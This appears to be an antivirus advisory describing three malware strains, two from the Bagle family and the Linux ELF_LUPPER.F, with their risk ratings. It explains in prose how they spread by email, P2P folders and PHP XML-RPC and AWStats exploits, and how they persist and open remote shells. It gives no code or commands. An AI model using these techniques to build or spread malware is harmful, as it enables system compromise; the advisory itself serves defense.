[Virus Alert] 3 new worms found
Worm name: WORM_BAGLE.EW
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm propagates by sending copies of itself as an attachment to email messages that it sends to target recipients, using its own Simple Mail Transfer Protocol (SMTP) engine. Through the said SMTP engine, it is able to easily send email messages even without using other mailing applications, such as Microsoft Outlook.
It is also capable of propagating via peer-to-peer (P2P) networks. It drops copies of itself in folders whose names contain the string SHAR. It does this routine under the assumption that the folder is used in various P2P applications.
The said copies are usually named after popular applications and actresses in order to entice users into downloading and executing the said files.
Worm name: TROJ_BAGLE.CW
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Trojan may be sent as an email attachment by another malware, usually belonging to the WORM_BAGLE family. It may also be downloaded from the Internet by unsuspecting users.
Upon execution, this Trojan drops a copy of itself as anti_troj.exe in the Windows system folder. It creates registry entries to ensure its automatic execution at every system startup.
It attempts to download files from several URLs, which are currently inaccessible. However, once these URLs become accessible, users may download possibly malicious files.
Worm name: ELF_LUPPER.F
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) is a command line tool used in connecting to various ports. It may be used to connect back to remote malicious users, thus providing them a shell to control an affected system.
It takes advantage of the XML RPC PHP vulnerability, which is found in several applications, as well as the AWSTATS CONFIGDIR exploit to propagate across networks. It does the said routines by generating random IP addresses and appending certain strings to access vulnerable systems.
More information on the said vulnerability and exploit can be found on the following Web pages:
• XML-RPC for PHP Remote Code Injection vulnerability
• WSTATS_CONFIGDIR_EXPLOIT
It injects part of its code so that it can download and execute a copy of itself. It may also connect to particular IP addresses to download and save the file LISTEN in the folder /tmp.
References: http://www.trendmicro.com/vinfo/ (TrendMirco Virus Security Info)
http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info
